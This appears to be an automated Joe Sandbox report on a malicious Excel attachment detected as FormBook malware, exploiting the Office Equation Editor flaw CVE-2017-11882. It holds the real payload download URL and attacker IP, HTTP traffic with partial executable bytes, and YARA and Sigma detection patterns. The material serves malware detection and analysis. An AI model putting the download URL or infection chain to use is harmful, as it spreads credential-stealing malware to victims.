Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ORDERCONFIRMATION_00001679918.xlsx

Overview

General Information

Sample Name:ORDERCONFIRMATION_00001679918.xlsx
Analysis ID:491746
MD5:9c34f5c5e1a78c24947c3fe5fce601ea
SHA1:727aa4c09c4c4f40d47ba87fa91921876b79f0f3
SHA256:ff1168daa5edebf6c75a6f24573e0b1e8153156b47e9c91712f8aa7968d745db
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2428 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2760 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1612 cmdline: 'C:\Users\Public\vbc.exe' MD5: A9DCC61F31601E771050463C4D41CDB0)
      • vbc.exe (PID: 2248 cmdline: 'C:\Users\Public\vbc.exe' MD5: A9DCC61F31601E771050463C4D41CDB0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.466845988.00000000001C0000.00000040.00000001.sdmpMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000004.00000002.469258298.0000000002770000.00000004.00000001.sdmpMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x27408:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x27792:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xa6a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0xa191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0xa7a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0xa91f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x281aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x940c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x28f22:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0xfb77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x10c1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0xcaa9:$sqlite3step: 68 34 1C 7B E1
    • 0xcbbc:$sqlite3step: 68 34 1C 7B E1
    • 0xcad8:$sqlite3text: 68 38 2A 90 C5
    • 0xcbfd:$sqlite3text: 68 38 2A 90 C5
    • 0xcaeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0xcc13:$sqlite3blob: 68 53 D8 7F 8C

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    5.0.vbc.exe.1c0000.1.raw.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0x6130:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x3e9e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x2460:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    4.2.vbc.exe.2770000.4.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0x4930:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x269e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0xc60:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    4.2.vbc.exe.2770000.4.raw.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    5.0.vbc.exe.1c0000.1.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    5.2.vbc.exe.1c0000.0.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.94.159.204, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2760, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2760, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2760, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1612
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2760, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1612

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: ORDERCONFIRMATION_00001679918.xlsxVirustotal: Detection: 30%Perma Link
    Source: ORDERCONFIRMATION_00001679918.xlsxReversingLabs: Detection: 28%
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY
    Antivirus detection for URL or domainShow sources
    Source: http://23.94.159.204/poc/vbc.exeAvira URL Cloud: Label: malware
    Multi AV Scanner detection for domain / URLShow sources
    Source: http://23.94.159.204/poc/vbc.exeVirustotal: Detection: 11%Perma Link
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeVirustotal: Detection: 42%Perma Link
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 20%
    Source: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dllVirustotal: Detection: 15%Perma Link
    Source: C:\Users\Public\vbc.exeVirustotal: Detection: 42%Perma Link
    Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 20%
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dllJoe Sandbox ML: detected
    Source: 4.2.vbc.exe.2770000.4.unpackAvira: Label: W32/Delf.I
    Source: 5.0.vbc.exe.1c0000.1.unpackAvira: Label: W32/Delf.I
    Source: 5.2.vbc.exe.1c0000.0.unpackAvira: Label: TR/ATRAPS.Gen

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.465849366.000000000E750000.00000004.00000001.sdmp
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405EC2 FindFirstFileA,FindClose,4_2_00405EC2
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_004054EC
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00402671 FindFirstFileA,4_2_00402671
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00402671 FindFirstFileA,5_2_00402671
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00405EC2 FindFirstFileA,FindClose,5_2_00405EC2
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_004054EC
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.94.159.204:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.94.159.204:80
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Sep 2021 19:08:39 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10Last-Modified: Mon, 27 Sep 2021 07:27:42 GMTETag: "46591-5ccf50857974b"Accept-Ranges: bytesContent-Length: 288145Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6d 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 00 00 00 84 02 00 00 04 00 00 2a 31 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 80 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 75 00 00 a0 00 00 00 00 70 03 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 5e 00 00 00 10 00 00 00 60 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a2 12 00 00 00 70 00 00 00 14 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 5d 02 00 00 90 00 00 00 06 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 70 03 00 00 0a 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /poc/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.94.159.204Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.159.204
    Source: vbc.exe, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: vbc.exe, 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: vbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: vbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: F76D3143.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F76D3143.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /poc/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.94.159.204Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00404FF1

    E-Banking Fraud:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: 5.0.vbc.exe.1c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 4.2.vbc.exe.2770000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 4.2.vbc.exe.2770000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 5.0.vbc.exe.1c0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 5.2.vbc.exe.1c0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000005.00000000.466845988.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000004.00000002.469258298.0000000002770000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_0040312A
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_0040312A
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004063544_2_00406354
